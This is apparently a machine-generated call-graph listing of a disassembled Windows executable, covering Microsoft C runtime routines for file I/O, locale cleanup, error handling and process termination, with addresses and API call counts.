22852 aa3bd3 22851->22852 22853 aa3b92 char_traits 22851->22853 22853->22852 22855 aae2cf 22853->22855 22856 aae2e1 22855->22856 22860 aae2ea ___scrt_uninitialize_crt 22855->22860 22857 aae157 ___scrt_uninitialize_crt 68 API calls 22856->22857 22858 aae2e7 22857->22858 22858->22852 22859 aae2f9 22859->22852 22860->22859 22863 aae0f7 22860->22863 22864 aae103 CallCatchBlock 22863->22864 22871 aae736 EnterCriticalSection 22864->22871 22866 aae111 22867 aae261 ___scrt_uninitialize_crt 68 API calls 22866->22867 22868 aae122 22867->22868 22872 aae14b 22868->22872 22871->22866 22875 aae74a LeaveCriticalSection 22872->22875 22874 aae134 22874->22852 22875->22874 22042 ab6196 22043 ab61a1 22042->22043 22047 ab61b1 22042->22047 22048 ab61b7 22043->22048 22046 ab73d1 ___free_lconv_mon 14 API calls 22046->22047 22049 ab61cc 22048->22049 22050 ab61d2 22048->22050 22051 ab73d1 ___free_lconv_mon 14 API calls 22049->22051 22052 ab73d1 ___free_lconv_mon 14 API calls 22050->22052 22051->22050 22053 ab61de 22052->22053 22054 ab73d1 ___free_lconv_mon 14 API calls 22053->22054 22055 ab61e9 22054->22055 22056 ab73d1 ___free_lconv_mon 14 API calls 22055->22056 22057 ab61f4 22056->22057 22058 ab73d1 ___free_lconv_mon 14 API calls 22057->22058 22059 ab61ff 22058->22059 22060 ab73d1 ___free_lconv_mon 14 API calls 22059->22060 22061 ab620a 22060->22061 22062 ab73d1 ___free_lconv_mon 14 API calls 22061->22062 22063 ab6215 22062->22063 22064 ab73d1 ___free_lconv_mon 14 API calls 22063->22064 22065 ab6220 22064->22065 22066 ab73d1 ___free_lconv_mon 14 API calls 22065->22066 22067 ab622b 22066->22067 22068 ab73d1 ___free_lconv_mon 14 API calls 22067->22068 22069 ab6239 22068->22069 22074 ab5fe3 22069->22074 22075 ab5fef CallCatchBlock 22074->22075 22090 ab13aa EnterCriticalSection 22075->22090 22077 ab6023 22091 ab6042 22077->22091 22080 ab5ff9 22080->22077 22081 ab73d1 ___free_lconv_mon 14 API calls 22080->22081 22081->22077 22082 ab604e 22083 ab605a CallCatchBlock 22082->22083 22095 ab13aa EnterCriticalSection 22083->22095 22085 ab6064 22086 ab6284 __dosmaperr 14 API calls 22085->22086 22087 ab6077 22086->22087 22096 ab6097 22087->22096 22090->22080 22094 ab13f2 LeaveCriticalSection 22091->22094 22093 ab6030 22093->22082 22094->22093 22095->22085 22099 ab13f2 LeaveCriticalSection 22096->22099 22098 ab6085 22098->22046 22099->22098 22905 ac17ea 22906 ac1821 22905->22906 22907 ac1803 22905->22907 22907->22906 22908 ab6670 2 API calls 22907->22908 22908->22907 21167 aa44e0 21168 aa44f0 char_traits 21167->21168 21169 aa4581 21168->21169 21170 aa450a char_traits 21168->21170 21171 aa45bf codecvt 21168->21171 21177 aa2ac0 21169->21177 21173 aa4616 21171->21173 21174 aa460e 21171->21174 21173->21170 21175 aaea23 67 API calls 21173->21175 21174->21170 21176 aa2ac0 _Fputc 41 API calls 21174->21176 21175->21170 21176->21170 21180 aadf8b 21177->21180 21181 aadf9e _Fputc 21180->21181 21186 aaddc7 21181->21186 21183 aadfad 21184 aadd8b _Fputc 39 API calls 21183->21184 21185 aa2ad2 21184->21185 21185->21170 21187 aaddd3 CallCatchBlock 21186->21187 21188 aadddc 21187->21188 21189 aade00 21187->21189 21190 ab1260 _Fputc 29 API calls 21188->21190 21200 aae736 EnterCriticalSection 21189->21200 21199 aaddf5 _Fgetc 21190->21199 21192 aade09 21193 ab5d12 _Fgetc 39 API calls 21192->21193 21196 aade1e 21192->21196 21193->21196 21194 aade8a 21197 ab1260 _Fputc 29 API calls 21194->21197 21195 aadebb _Fputc 21201 aadef3 21195->21201 21196->21194 21196->21195 21197->21199 21199->21183 21200->21192 21204 aae74a LeaveCriticalSection 21201->21204 21203 aadef9 21203->21199 21204->21203 22652 aa46e0 22653 aa46fc 22652->22653 22654 aa46f0 22652->22654 22656 aae736 EnterCriticalSection 22654->22656 22656->22653 21205 ab3cf8 21208 ab39c4 21205->21208 21209 ab39d0 CallCatchBlock 21208->21209 21216 ab13aa EnterCriticalSection 21209->21216 21211 ab3a08 21217 ab3a26 21211->21217 21212 ab39da 21212->21211 21214 ac04bf __Getctype 14 API calls 21212->21214 21214->21212 21216->21212 21220 ab13f2 LeaveCriticalSection 21217->21220 21219 ab3a14 21220->21219 22933 aa3bf0 22934 aa3bff 22933->22934 22935 aa3c45 22934->22935 22939 ab0850 22934->22939 22938 aa5d50 39 API calls 22938->22935 22940 ab0863 _Fputc 22939->22940 22945 ab0787 22940->22945 22942 ab0878 22943 aadd8b _Fputc 39 API calls 22942->22943 22944 aa3c3e 22943->22944 22944->22935 22944->22938 22946 ab0799 22945->22946 22949 ab07bc 22945->22949 22947 ab1260 _Fputc 29 API calls 22946->22947 22948 ab07b4 22947->22948 22948->22942 22949->22946 22950 ab07e3 22949->22950 22953 ab068c 22950->22953 22954 ab0698 CallCatchBlock 22953->22954 22961 aae736 EnterCriticalSection 22954->22961 22956 ab06a6 22962 ab06e7 22956->22962 22958 ab06b3 22971 ab06db 22958->22971 22961->22956 22963 aae1f8 ___scrt_uninitialize_crt 64 API calls 22962->22963 22964 ab0702 22963->22964 22965 ab7775 14 API calls 22964->22965 22966 ab070c 22965->22966 22967 ab0727 22966->22967 22968 ab794f __dosmaperr 14 API calls 22966->22968 22967->22958 22969 ab074b 22968->22969 22970 ab73d1 ___free_lconv_mon 14 API calls 22969->22970 22970->22967 22974 aae74a LeaveCriticalSection 22971->22974 22973 ab06c4 22973->22942 22974->22973 23022 ab6720 23023 ab672c CallCatchBlock 23022->23023 23034 ab13aa EnterCriticalSection 23023->23034 23025 ab6733 23035 abf15c 23025->23035 23032 ab6670 2 API calls 23033 ab6751 23032->23033 23054 ab6777 23033->23054 23034->23025 23036 abf168 CallCatchBlock 23035->23036 23037 abf192 23036->23037 23038 abf171 23036->23038 23057 ab13aa EnterCriticalSection 23037->23057 23040 ab1ea8 __dosmaperr 14 API calls 23038->23040 23041 abf176 23040->23041 23042 ab12dd __wsopen_s 39 API calls 23041->23042 23044 ab6742 23042->23044 23043 abf1ca 23058 abf1f1 23043->23058 23044->23033 23048 ab65ba GetStartupInfoW 23044->23048 23045 abf19e 23045->23043 23047 abf0ac __wsopen_s 15 API calls 23045->23047 23047->23045 23049 ab666b 23048->23049 23050 ab65d7 23048->23050 23049->23032 23050->23049 23051 abf15c 40 API calls 23050->23051 23052 ab65ff 23051->23052 23052->23049 23053 ab662f GetFileType 23052->23053 23053->23052 23062 ab13f2 LeaveCriticalSection 23054->23062 23056 ab6762 23057->23045 23061 ab13f2 LeaveCriticalSection 23058->23061 23060 abf1f8 23060->23044 23061->23060 23062->23056 17861 ab5d39 17873 ab5d12 17861->17873 17863 ab5d52 17864 ab5d9e 17864->17863 17872 ab5e00 17864->17872 17880 ab81e7 17864->17880 17869 ab5df3 17869->17872 17888 ab985b 17869->17888 17893 ab5e2f 17872->17893 17874 ab5d1e 17873->17874 17875 ab5d33 17873->17875 17912 ab1ea8 17874->17912 17875->17863 17875->17864 17904 ab5f01 17875->17904 17883 ab81f3 17880->17883 17881 ab8221 17881->17869 17882 ab821d 17882->17869 17883->17881 17883->17882 17884 ab5d12 _Fgetc 39 API calls 17883->17884 17885 ab820e 17884->17885 18346 ac1db0 17885->18346 17887 ab8214 17887->17869 17889 ab794f __dosmaperr 14 API calls 17888->17889 17890 ab9878 17889->17890 17891 ab73d1 ___free_lconv_mon 14 API calls 17890->17891 17892 ab9882 17891->17892 17892->17872 17894 ab5d12 _Fgetc 39 API calls 17893->17894 17895 ab5e3e 17894->17895 17896 ab5e51 17895->17896 17897 ab5ee4 17895->17897 17899 ab5e6e 17896->17899 17902 ab5e95 17896->17902 17898 ab70a4 __wsopen_s 64 API calls 17897->17898 17901 ab5e11 17898->17901 18355 ab70a4 17899->18355 17902->17901 18366 aba3df 17902->18366 17905 ab5f17 17904->17905 17906 ab5f1b 17904->17906 17905->17864 17907 abf476 __wsopen_s 39 API calls 17906->17907 17911 ab5f6a 17906->17911 17908 ab5f3c 17907->17908 17909 ab5f44 SetFilePointerEx 17908->17909 17908->17911 17910 ab5f5b GetFileSizeEx 17909->17910 17909->17911 17910->17911 17911->17864 17917 ab6420 GetLastError 17912->17917 17914 ab1ead 17915 ab12dd 17914->17915 18138 ab1229 17915->18138 17918 ab643c 17917->17918 17919 ab6436 17917->17919 17923 ab6440 SetLastError 17918->17923 17945 ab7ea3 17918->17945 17940 ab7e64 17919->17940 17923->17914 17927 ab6486 17930 ab7ea3 __dosmaperr 6 API calls 17927->17930 17928 ab6475 17929 ab7ea3 __dosmaperr 6 API calls 17928->17929 17937 ab6483 17929->17937 17931 ab6492 17930->17931 17932 ab64ad 17931->17932 17933 ab6496 17931->17933 17963 ab60fd 17932->17963 17934 ab7ea3 __dosmaperr 6 API calls 17933->17934 17934->17937 17957 ab73d1 17937->17957 17939 ab73d1 ___free_lconv_mon 12 API calls 17939->17923 17968 ab7c51 17940->17968 17942 ab7e80 17943 ab7e9b TlsGetValue 17942->17943 17944 ab7e89 17942->17944 17944->17918 17946 ab7c51 std::_Locinfo::_Locinfo_ctor 5 API calls 17945->17946 17947 ab7ebf 17946->17947 17948 ab6458 17947->17948 17949 ab7edd TlsSetValue 17947->17949 17948->17923 17950 ab794f 17948->17950 17955 ab795c __dosmaperr 17950->17955 17951 ab799c 17954 ab1ea8 __dosmaperr 13 API calls 17951->17954 17952 ab7987 RtlAllocateHeap 17953 ab646d 17952->17953 17952->17955 17953->17927 17953->17928 17954->17953 17955->17951 17955->17952 17982 ab2c09 17955->17982 17958 ab73dc RtlFreeHeap 17957->17958 17962 ab7406 17957->17962 17959 ab73f1 GetLastError 17958->17959 17958->17962 17960 ab73fe __dosmaperr 17959->17960 17961 ab1ea8 __dosmaperr 12 API calls 17960->17961 17961->17962 17962->17923 17996 ab5f91 17963->17996 17969 ab7c81 17968->17969 17973 ab7c7d std::_Locinfo::_Locinfo_ctor 17968->17973 17969->17973 17974 ab7b86 17969->17974 17972 ab7c9b GetProcAddress 17972->17973 17973->17942 17980 ab7b97 ___vcrt_FlsGetValue 17974->17980 17975 ab7bb5 LoadLibraryExW 17977 ab7bd0 GetLastError 17975->17977 17978 ab7c34 17975->17978 17976 ab7c2d 17976->17972 17976->17973 17977->17980 17978->17976 17979 ab7c46 FreeLibrary 17978->17979 17979->17976 17980->17975 17980->17976 17981 ab7c03 LoadLibraryExW 17980->17981 17981->17978 17981->17980 17985 ab2c35 17982->17985 17986 ab2c41 CallCatchBlock 17985->17986 17991 ab13aa EnterCriticalSection 17986->17991 17988 ab2c4c _unexpected 17992 ab2c83 17988->17992 17991->17988 17995 ab13f2 LeaveCriticalSection 17992->17995 17994 ab2c14 17994->17955 17995->17994 17997 ab5f9d CallCatchBlock 17996->17997 18010 ab13aa EnterCriticalSection 17997->18010 17999 ab5fa7 18011 ab5fd7 17999->18011 18002 ab60a3 18003 ab60af CallCatchBlock 18002->18003 18015 ab13aa EnterCriticalSection 18003->18015 18005 ab60b9 18016 ab6284 18005->18016 18007 ab60d1 18020 ab60f1 18007->18020 18010->17999 18014 ab13f2 LeaveCriticalSection 18011->18014 18013 ab5fc5 18013->18002 18014->18013 18015->18005 18017 ab62ba __Getctype 18016->18017 18018 ab6293 __Getctype 18016->18018 18017->18007 18018->18017 18023 ac01f2 18018->18023 18137 ab13f2 LeaveCriticalSection 18020->18137 18022 ab60df 18022->17939 18024 ac0272 18023->18024 18027 ac0208 18023->18027 18026 ab73d1 ___free_lconv_mon 14 API calls 18024->18026 18049 ac02c0 18024->18049 18028 ac0294 18026->18028 18027->18024 18029 ac023b 18027->18029 18031 ab73d1 ___free_lconv_mon 14 API calls 18027->18031 18030 ab73d1 ___free_lconv_mon 14 API calls 18028->18030 18037 ab73d1 ___free_lconv_mon 14 API calls 18029->18037 18050 ac025d 18029->18050 18032 ac02a7 18030->18032 18035 ac0230 18031->18035 18036 ab73d1 ___free_lconv_mon 14 API calls 18032->18036 18033 ab73d1 ___free_lconv_mon 14 API calls 18038 ac0267 18033->18038 18034 ac02ce 18039 ac032e 18034->18039 18048 ab73d1 14 API calls ___free_lconv_mon 18034->18048 18051 abf4f6 18035->18051 18042 ac02b5 18036->18042 18043 ac0252 18037->18043 18044 ab73d1 ___free_lconv_mon 14 API calls 18038->18044 18040 ab73d1 ___free_lconv_mon 14 API calls 18039->18040 18045 ac0334 18040->18045 18046 ab73d1 ___free_lconv_mon 14 API calls 18042->18046 18079 abf955 18043->18079 18044->18024 18045->18017 18046->18049 18048->18034 18091 ac0363 18049->18091 18050->18033 18052 abf507 18051->18052 18078 abf5f0 18051->18078 18053 abf518 18052->18053 18054 ab73d1 ___free_lconv_mon 14 API calls 18052->18054 18055 abf52a 18053->18055 18056 ab73d1 ___free_lconv_mon 14 API calls 18053->18056 18054->18053 18057 abf53c 18055->18057 18059 ab73d1 ___free_lconv_mon 14 API calls 18055->18059 18056->18055 18058 abf54e 18057->18058 18060 ab73d1 ___free_lconv_mon 14 API calls 18057->18060 18061 ab73d1 ___free_lconv_mon 14 API calls 18058->18061 18062 abf560 18058->18062 18059->18057 18060->18058 18061->18062 18063 abf572 18062->18063 18064 ab73d1 ___free_lconv_mon 14 API calls 18062->18064 18065 abf584 18063->18065 18067 ab73d1 ___free_lconv_mon 14 API calls 18063->18067 18064->18063 18066 abf596 18065->18066 18068 ab73d1 ___free_lconv_mon 14 API calls 18065->18068 18069 abf5a8 18066->18069 18070 ab73d1 ___free_lconv_mon 14 API calls 18066->18070 18067->18065 18068->18066 18071 abf5ba 18069->18071 18072 ab73d1 ___free_lconv_mon 14 API calls 18069->18072 18070->18069 18073 abf5cc 18071->18073 18075 ab73d1 ___free_lconv_mon 14 API calls 18071->18075 18072->18071 18074 abf5de 18073->18074 18076 ab73d1 ___free_lconv_mon 14 API calls 18073->18076 18077 ab73d1 ___free_lconv_mon 14 API calls 18074->18077 18074->18078 18075->18073 18076->18074 18077->18078 18078->18029 18080 abf962 18079->18080 18090 abf9ba 18079->18090 18081 abf972 18080->18081 18082 ab73d1 ___free_lconv_mon 14 API calls 18080->18082 18083 abf984 18081->18083 18084 ab73d1 ___free_lconv_mon 14 API calls 18081->18084 18082->18081 18085 abf996 18083->18085 18086 ab73d1 ___free_lconv_mon 14 API calls 18083->18086 18084->18083 18087 abf9a8 18085->18087 18088 ab73d1 ___free_lconv_mon 14 API calls 18085->18088 18086->18085 18089 ab73d1 ___free_lconv_mon 14 API calls 18087->18089 18087->18090 18088->18087 18089->18090 18090->18050 18092 ac0370 18091->18092 18093 ac038f 18091->18093 18092->18093 18097 abfe7c 18092->18097 18093->18034 18096 ab73d1 ___free_lconv_mon 14 API calls 18096->18093 18098 abff5a 18097->18098 18099 abfe8d 18097->18099 18098->18096 18133 abfbdb 18099->18133 18102 abfbdb __Getctype 14 API calls 18103 abfea0 18102->18103 18104 abfbdb __Getctype 14 API calls 18103->18104 18105 abfeab 18104->18105 18106 abfbdb __Getctype 14 API calls 18105->18106 18107 abfeb6 18106->18107 18108 abfbdb __Getctype 14 API calls 18107->18108 18109 abfec4 18108->18109 18110 ab73d1 ___free_lconv_mon 14 API calls 18109->18110 18111 abfecf 18110->18111 18112 ab73d1 ___free_lconv_mon 14 API calls 18111->18112 18113 abfeda 18112->18113 18114 ab73d1 ___free_lconv_mon 14 API calls 18113->18114 18115 abfee5 18114->18115 18116 abfbdb __Getctype 14 API calls 18115->18116 18117 abfef3 18116->18117 18118 abfbdb __Getctype 14 API calls 18117->18118 18119 abff01 18118->18119 18120 abfbdb __Getctype 14 API calls 18119->18120 18121 abff12 18120->18121 18122 abfbdb __Getctype 14 API calls 18121->18122 18123 abff20 18122->18123 18124 abfbdb __Getctype 14 API calls 18123->18124 18125 abff2e 18124->18125 18126 ab73d1 ___free_lconv_mon 14 API calls 18125->18126 18127 abff39 18126->18127 18128 ab73d1 ___free_lconv_mon 14 API calls 18127->18128 18129 abff44 18128->18129 18130 ab73d1 ___free_lconv_mon 14 API calls 18129->18130 18134 abfbed 18133->18134 18135 abfbfc 18134->18135 18136 ab73d1 ___free_lconv_mon 14 API calls 18134->18136 18135->18102 18136->18134 18137->18022 18139 ab123b _Fputc 18138->18139 18144 ab1260 18139->18144 18145 ab1277 18144->18145 18146 ab1270 18144->18146 18148 ab1253 18145->18148 18163 ab10b8 18145->18163 18159 aadefb GetLastError 18146->18159 18153 aadd8b 18148->18153 18150 ab12ac 18150->18148 18166 ab130a IsProcessorFeaturePresent 18150->18166 18152 ab12dc 18154 aadd97 18153->18154 18155 aaddae 18154->18155 18206 aadf41 18154->18206 18157 aaddc1 18155->18157 18158 aadf41 _Fputc 39 API calls 18155->18158 18158->18157 18160 aadf14 18159->18160 18170 ab64d1 18160->18170 18164 ab10dc 18163->18164 18165 ab10c3 GetLastError SetLastError 18163->18165 18164->18150 18165->18150 18167 ab1316 18166->18167 18192 ab10e1 18167->18192 18171 ab64ea 18170->18171 18172 ab64e4 18170->18172 18174 ab7ea3 __dosmaperr 6 API calls 18171->18174 18176 aadf2c SetLastError 18171->18176 18173 ab7e64 __dosmaperr 6 API calls 18172->18173 18173->18171 18175 ab6504 18174->18175 18175->18176 18177 ab794f __dosmaperr 14 API calls 18175->18177 18176->18145 18178 ab6514 18177->18178 18179 ab651c 18178->18179 18180 ab6531 18178->18180 18181 ab7ea3 __dosmaperr 6 API calls 18179->18181 18182 ab7ea3 __dosmaperr 6 API calls 18180->18182 18189 ab6528 18181->18189 18183 ab653d 18182->18183 18184 ab6541 18183->18184 18185 ab6550 18183->18185 18187 ab7ea3 __dosmaperr 6 API calls 18184->18187 18188 ab60fd __dosmaperr 14 API calls 18185->18188 18186 ab73d1 ___free_lconv_mon 14 API calls 18186->18176 18187->18189 18190 ab655b 18188->18190 18189->18186 18191 ab73d1 ___free_lconv_mon 14 API calls 18190->18191 18191->18176 18193 ab10fd __fread_nolock _unexpected 18192->18193 18194 ab1129 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18193->18194 18197 ab11fa _unexpected 18194->18197 18196 ab1218 GetCurrentProcess TerminateProcess 18196->18152 18198 aaa215 18197->18198 18199 aaa21e IsProcessorFeaturePresent 18198->18199 18200 aaa21d 18198->18200 18202 aaa95f 18199->18202 18200->18196 18205 aaa922 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18202->18205 18204 aaaa42 18204->18196 18205->18204 18207 aadf4b 18206->18207 18208 aadf54 18206->18208 18209 aadefb _Fputc 16 API calls 18207->18209 18208->18155 18210 aadf50 18209->18210 18210->18208 18213 ab1dc7 18210->18213 18224 abb6ca 18213->18224 18216 ab1dd7 18218 ab1de1 IsProcessorFeaturePresent 18216->18218 18223 ab1e00 18216->18223 18220 ab1ded 18218->18220 18221 ab10e1 _unexpected 8 API calls 18220->18221 18221->18223 18254 ab37a7 18223->18254 18257 abb5f8 18224->18257 18227 abb70f 18228 abb71b CallCatchBlock 18227->18228 18229 ab6420 __dosmaperr 14 API calls 18228->18229 18230 abb76b 18228->18230 18231 abb77d _unexpected 18228->18231 18236 abb74c _unexpected 18228->18236 18229->18236 18232 ab1ea8 __dosmaperr 14 API calls 18230->18232 18233 abb7b3 _unexpected 18231->18233 18268 ab13aa EnterCriticalSection 18231->18268 18234 abb770 18232->18234 18239 abb8ed 18233->18239 18240 abb7f0 18233->18240 18250 abb81e 18233->18250 18237 ab12dd __wsopen_s 39 API calls 18234->18237 18236->18230 18236->18231 18253 abb755 18236->18253 18237->18253 18241 abb8f8 18239->18241 18300 ab13f2 LeaveCriticalSection 18239->18300 18240->18250 18269 ab62cf GetLastError 18240->18269 18244 ab37a7 _unexpected 21 API calls 18241->18244 18246 abb900 18244->18246 18248 ab62cf __Getctype 39 API calls 18251 abb873 18248->18251 18249 ab62cf __Getctype 39 API calls 18249->18250 18296 abb899 18250->18296 18252 ab62cf __Getctype 39 API calls 18251->18252 18251->18253 18252->18253 18253->18216 18302 ab35d5 18254->18302 18258 abb604 CallCatchBlock 18257->18258 18263 ab13aa EnterCriticalSection 18258->18263 18260 abb612 18264 abb654 18260->18264 18263->18260 18267 ab13f2 LeaveCriticalSection 18264->18267 18266 ab1dcc 18266->18216 18266->18227 18267->18266 18268->18233 18270 ab62eb 18269->18270 18271 ab62e5 18269->18271 18273 ab7ea3 __dosmaperr 6 API calls 18270->18273 18275 ab62ef SetLastError 18270->18275 18272 ab7e64 __dosmaperr 6 API calls 18271->18272 18272->18270 18274 ab6307 18273->18274 18274->18275 18277 ab794f __dosmaperr 14 API calls 18274->18277 18278 ab637f 18275->18278 18279 ab6384 18275->18279 18280 ab631c 18277->18280 18278->18249 18283 ab1dc7 __FrameHandler3::FrameUnwindToState 37 API calls 18279->18283 18281 ab6335 18280->18281 18282 ab6324 18280->18282 18285 ab7ea3 __dosmaperr 6 API calls 18281->18285 18284 ab7ea3 __dosmaperr 6 API calls 18282->18284 18286 ab6389 18283->18286 18287 ab6332 18284->18287 18288 ab6341 18285->18288 18292 ab73d1 ___free_lconv_mon 14 API calls 18287->18292 18289 ab635c 18288->18289 18290 ab6345 18288->18290 18293 ab60fd __dosmaperr 14 API calls 18289->18293 18291 ab7ea3 __dosmaperr 6 API calls 18290->18291 18291->18287 18292->18275 18294 ab6367 18293->18294 18295 ab73d1 ___free_lconv_mon 14 API calls 18294->18295 18295->18275 18297 abb865 18296->18297 18298 abb89d 18296->18298 18297->18248 18297->18251 18297->18253 18301 ab13f2 LeaveCriticalSection 18298->18301 18300->18241 18301->18297 18303 ab3602 18302->18303 18311 ab3613 18302->18311 18313 ab369d GetModuleHandleW 18303->18313 18308 ab1e0a 18320 ab34a0 18311->18320 18314 ab3607 18313->18314 18314->18311 18315 ab36f8 GetModuleHandleExW 18314->18315 18316 ab374b 18315->18316 18317 ab3737 GetProcAddress 18315->18317 18318 ab375e FreeLibrary 18316->18318 18319 ab3767 18316->18319 18317->18316 18318->18319 18319->18311 18321 ab34ac CallCatchBlock 18320->18321 18335 ab13aa EnterCriticalSection 18321->18335 18323 ab34b6 18336 ab34ed 18323->18336 18325 ab34c3 18340 ab34e1 18325->18340 18328 ab366c 18343 ab36df 18328->18343 18330 ab3676 18331 ab368a 18330->18331 18332 ab367a GetCurrentProcess TerminateProcess 18330->18332 18333 ab36f8 _unexpected 3 API calls 18331->18333 18332->18331 18334 ab3692 ExitProcess 18333->18334 18335->18323 18337 ab34f9 _unexpected CallCatchBlock 18336->18337 18338 ab533d _unexpected 14 API calls 18337->18338 18339 ab355d _unexpected 18337->18339 18338->18339 18339->18325 18341 ab13f2 std::_Lockit::~_Lockit LeaveCriticalSection 18340->18341 18342 ab34cf 18341->18342 18342->18308 18342->18328 18344 abf085 _unexpected 5 API calls 18343->18344 18345 ab36e4 _unexpected 18344->18345 18345->18330 18347 ac1dbd 18346->18347 18348 ac1dca 18346->18348 18349 ab1ea8 __dosmaperr 14 API calls 18347->18349 18351 ac1dd6 18348->18351 18352 ab1ea8 __dosmaperr 14 API calls 18348->18352 18350 ac1dc2 18349->18350 18350->17887 18351->17887 18353 ac1df7 18352->18353 18354 ab12dd __wsopen_s 39 API calls 18353->18354 18354->18350 18357 ab70b0 CallCatchBlock 18355->18357 18356 ab70f1 18359 ab1260 _Fputc 29 API calls 18356->18359 18357->18356 18358 ab7137 18357->18358 18365 ab70b8 18357->18365 18372 abf1fa EnterCriticalSection 18358->18372 18359->18365 18361 ab713d 18362 ab715b 18361->18362 18373 ab71b5 18361->18373 18401 ab71ad 18362->18401 18365->17901 18367 aba3f3 _Fputc 18366->18367 18538 aba237 18367->18538 18370 aadd8b _Fputc 39 API calls 18371 aba417 18370->18371 18371->17901 18372->18361 18374 ab71dd 18373->18374 18396 ab7200 __wsopen_s 18373->18396 18375 ab71e1 18374->18375 18377 ab723c 18374->18377 18376 ab1260 _Fputc 29 API calls 18375->18376 18376->18396 18378 ab725a 18377->18378 18411 aba47d 18377->18411 18404 ab6cfa 18378->18404 18382 ab72b9 18384 ab72cd 18382->18384 18385 ab7322 WriteFile 18382->18385 18383 ab7272 18386 ab727a 18383->18386 18387 ab72a1 18383->18387 18390 ab730e 18384->18390 18391 ab72d5 18384->18391 18388 ab7344 GetLastError 18385->18388 18385->18396 18386->18396 18414 ab6c92 18386->18414 18419 ab68cb GetConsoleOutputCP 18387->18419 18388->18396 18447 ab6d77 18390->18447 18394 ab72fa 18391->18394 18395 ab72da 18391->18395 18439 ab6f3b 18394->18439 18395->18396 18398 ab72e3 18395->18398 18396->18362 18397 ab72b4 18397->18396 18432 ab6e52 18398->18432 18537 abf2af LeaveCriticalSection 18401->18537 18403 ab71b3 18403->18365 18405 ac1db0 __fread_nolock 39 API calls 18404->18405 18407 ab6d0c 18405->18407 18406 ab6d70 18406->18382 18406->18383 18407->18406 18408 ab6d3a 18407->18408 18454 ab04c0 18407->18454 18408->18406 18410 ab6d54 GetConsoleMode 18408->18410 18410->18406 18512 aba35c 18411->18512 18413 aba496 18413->18378 18415 ab6ce9 18414->18415 18416 ab6cb4 18414->18416 18415->18396 18416->18415 18417 ab6ceb GetLastError 18416->18417 18418 ac1f7d 5 API calls __wsopen_s 18416->18418 18417->18415 18418->18416 18420 ab693d 18419->18420 18425 ab6944 ctype 18419->18425 18422 ab04c0 _fread 39 API calls 18420->18422 18421 ab6bfa 18423 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18421->18423 18422->18425 18424 ab6c8b 18423->18424 18424->18397 18425->18421 18426 ab90db 40 API calls __wsopen_s 18425->18426 18427 ac1e75 5 API calls std::_Locinfo::_Locinfo_ctor 18425->18427 18429 ab6b73 WriteFile 18425->18429 18431 ab6bb1 WriteFile 18425->18431 18534 abd8f1 18425->18534 18426->18425 18427->18425 18429->18425 18430 ab6c69 GetLastError 18429->18430 18430->18421 18431->18425 18431->18430 18436 ab6e61 __wsopen_s 18432->18436 18433 ab6f20 18435 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18433->18435 18434 ab6ed6 WriteFile 18434->18436 18437 ab6f22 GetLastError 18434->18437 18438 ab6f39 18435->18438 18436->18433 18436->18434 18437->18433 18438->18396 18446 ab6f4a __wsopen_s 18439->18446 18440 ab7052 18441 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18440->18441 18442 ab706b 18441->18442 18442->18397 18443 abd8f1 _fread WideCharToMultiByte 18443->18446 18444 ab7054 GetLastError 18444->18440 18445 ab7009 WriteFile 18445->18444 18445->18446 18446->18440 18446->18443 18446->18444 18446->18445 18452 ab6d86 __wsopen_s 18447->18452 18448 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18449 ab6e50 18448->18449 18449->18397 18450 ab6df6 WriteFile 18451 ab6e39 GetLastError 18450->18451 18450->18452 18453 ab6e37 18451->18453 18452->18450 18452->18453 18453->18448 18455 aadf41 _Fputc 39 API calls 18454->18455 18456 ab04d0 18455->18456 18461 ab8389 18456->18461 18462 ab04ed 18461->18462 18463 ab83a0 18461->18463 18465 ab83e7 18462->18465 18463->18462 18469 ac043e 18463->18469 18466 ab83fe 18465->18466 18467 ab04fa 18465->18467 18466->18467 18491 abe97f 18466->18491 18467->18408 18470 ac044a CallCatchBlock 18469->18470 18471 ab62cf __Getctype 39 API calls 18470->18471 18472 ac0453 18471->18472 18479 ac0499 18472->18479 18482 ab13aa EnterCriticalSection 18472->18482 18474 ac0471 18483 ac04bf 18474->18483 18479->18462 18480 ab1dc7 __FrameHandler3::FrameUnwindToState 39 API calls 18481 ac04be 18480->18481 18482->18474 18484 ac04cd __Getctype 18483->18484 18486 ac0482 18483->18486 18485 ac01f2 __Getctype 14 API calls 18484->18485 18484->18486 18485->18486 18487 ac049e 18486->18487 18490 ab13f2 LeaveCriticalSection 18487->18490 18489 ac0495 18489->18479 18489->18480 18490->18489 18492 ab62cf __Getctype 39 API calls 18491->18492 18493 abe984 18492->18493 18496 abe897 18493->18496 18497 abe8a3 CallCatchBlock 18496->18497 18498 abe8bd 18497->18498 18507 ab13aa EnterCriticalSection 18497->18507 18500 abe8c4 18498->18500 18503 ab1dc7 __FrameHandler3::FrameUnwindToState 39 API calls 18498->18503 18500->18467 18501 abe8f9 18508 abe916 18501->18508 18505 abe936 18503->18505 18504 abe8cd 18504->18501 18506 ab73d1 ___free_lconv_mon 14 API calls 18504->18506 18506->18501 18507->18504 18511 ab13f2 LeaveCriticalSection 18508->18511 18510 abe91d 18510->18498 18511->18510 18518 abf476 18512->18518 18514 aba36e 18515 aba38a SetFilePointerEx 18514->18515 18517 aba376 __wsopen_s 18514->18517 18516 aba3a2 GetLastError 18515->18516 18515->18517 18516->18517 18517->18413 18519 abf498 18518->18519 18520 abf483 18518->18520 18522 ab1e95 __dosmaperr 14 API calls 18519->18522 18526 abf4bd 18519->18526 18531 ab1e95 18520->18531 18524 abf4c8 18522->18524 18527 ab1ea8 __dosmaperr 14 API calls 18524->18527 18525 ab1ea8 __dosmaperr 14 API calls 18528 abf490 18525->18528 18526->18514 18529 abf4d0 18527->18529 18528->18514 18530 ab12dd __wsopen_s 39 API calls 18529->18530 18530->18528 18532 ab6420 __dosmaperr 14 API calls 18531->18532 18533 ab1e9a 18532->18533 18533->18525 18535 abd904 _fread 18534->18535 18536 abd942 WideCharToMultiByte 18535->18536 18536->18425 18537->18403 18540 aba243 CallCatchBlock 18538->18540 18539 aba24b 18539->18370 18540->18539 18541 aba286 18540->18541 18543 aba2cc 18540->18543 18542 ab1260 _Fputc 29 API calls 